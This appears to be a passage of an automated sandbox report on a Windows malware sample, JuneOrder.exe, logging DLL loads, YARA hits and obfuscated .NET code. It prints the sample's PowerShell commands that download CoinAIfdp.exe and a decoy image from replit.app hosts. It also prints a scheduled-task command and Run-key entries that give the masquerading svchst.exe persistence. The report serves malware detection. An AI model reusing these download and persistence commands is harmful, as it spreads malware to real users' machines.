                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\svchst.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\JuneOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: CoinAI.pdb source: CoinAIfdp.exe, 00000006.00000002.1629482910.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000000.1560929990.00000000009A2000.00000002.00000001.01000000.00000005.sdmp, CoinAIfdp.exe.5.dr, svchst.exe.6.dr

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\JuneOrder.exeUnpacked PE file: 0.2.JuneOrder.exe.400000.0.unpack
                Source: Yara matchFile source: JuneOrder.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.JuneOrder.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.JuneOrder.exe.400000.0.unpack, type: UNPACKEDPE
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, cl5fowJh7yxNN2fIgNI.cs.Net Code: Type.GetTypeFromHandle(G0Ts6oRkvqpVLhq7HHI.IaQjiUtbte(16777343)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G0Ts6oRkvqpVLhq7HHI.IaQjiUtbte(16777247)),Type.GetTypeFromHandle(G0Ts6oRkvqpVLhq7HHI.IaQjiUtbte(16777299))})
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"Jump to behavior
                Source: CoinAIfdp.exe.5.drStatic PE information: 0xF68E0DF4 [Sun Jan 30 05:07:00 2101 UTC]
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040A756
                Source: JuneOrder.exeStatic PE information: section name: .code
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055B35AF push eax; ret 6_2_055B35B9
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055B240E push eax; ret 6_2_055B2422
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_055B1EF3 push 0000003Eh; retn 0000h6_2_055B224D
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_050736D7 push ebx; iretd 13_2_050736DA
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F436D7 push ebx; iretd 15_2_04F436DA
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04EA36D7 push ebx; iretd 16_2_04EA36DA
                Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_048E36D7 push ebx; iretd 17_2_048E36DA
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, -Module--6c44aef7-a768-4888-a433-d85c5ad109cb-.csHigh entropy of concatenated method names: 'ed259c4241c584c7d8ab38c9e6495f52e', 'aLlqhjjNuq4OZAFnvIu', 'EXXyfUjYNp6ChnXULQN', 's2rXy3jQd7ThR5VCfHP', 'yJmnnDjqGv0nUip5CBt', 'bx1t0TjSMiVc0V3dsgq'
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, cl5fowJh7yxNN2fIgNI.csHigh entropy of concatenated method names: 'cDuVN5WPQV5pvpZjMxp', 'cEidBdWttxUi3uZDUFR', 'd2gRg0Ore5', 'qHkN85W427RgXUEk2bl', 'b5VrLjW96mcc37NbJ2i', 'QCBCPcWmd9heh3hgxs1', 'vvbxNjWDUNfHKynjokX', 'f6knqCW3JVm8U8wIos7', 'mPfe2CW7LfltdC3f1RG', 'HDCBXfWdwxDlos17nNc'
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, IFrcn0KXLJxTL67p1k.csHigh entropy of concatenated method names: 'BEBYFA3kO', 'nrHQhZmJn', 'JpUqoG1vn', 'Ep5SnocFp', 'M2sF8noCm', 'vFdw2AVJT', 'fVRWs1k7f', 'df1iXgVkR', 'JEQTCyrn5', 'nIAy3A5qe'
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, Form1.csHigh entropy of concatenated method names: 'xhdf4A1bo', 'Dispose', 'ofEjFq0yp', 'FBrSExWXpsKqmLpoDZl', 'AcyVQ5WrUl5mU5RsjAJ', 'jGit5bWsUfQr6MnSM8c', 'Rtb2qvWRmnediMp1tYr', 'j5M3eUWCB3TnqeEVNp4', 'rUIxgNWlrx212YD3iGB', 'VnHoPZW1npsaNKkTg1h'
                Source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, wLHv7QXFZdocIWtp0bP.csHigh entropy of concatenated method names: 'yJuMqZ28ag', 'ifLMSEC7e6', 'a5OMFO86av', 'MSBMwraFNb', 'W0KMW9uaDi', 'GhpMiRcvQG', 'E3QMTS0iol', 'GD5XDY8EdE', 'gruMyqey39', 'LPVM0bVt1j'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile created: C:\Users\user\AppData\Roaming\svchst.exeJump to dropped file

                Boot Survival

                barindex
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"'
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
                Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
                Source: C:\Users\user\AppData\Roaming\svchst.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CoinAi.exe
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
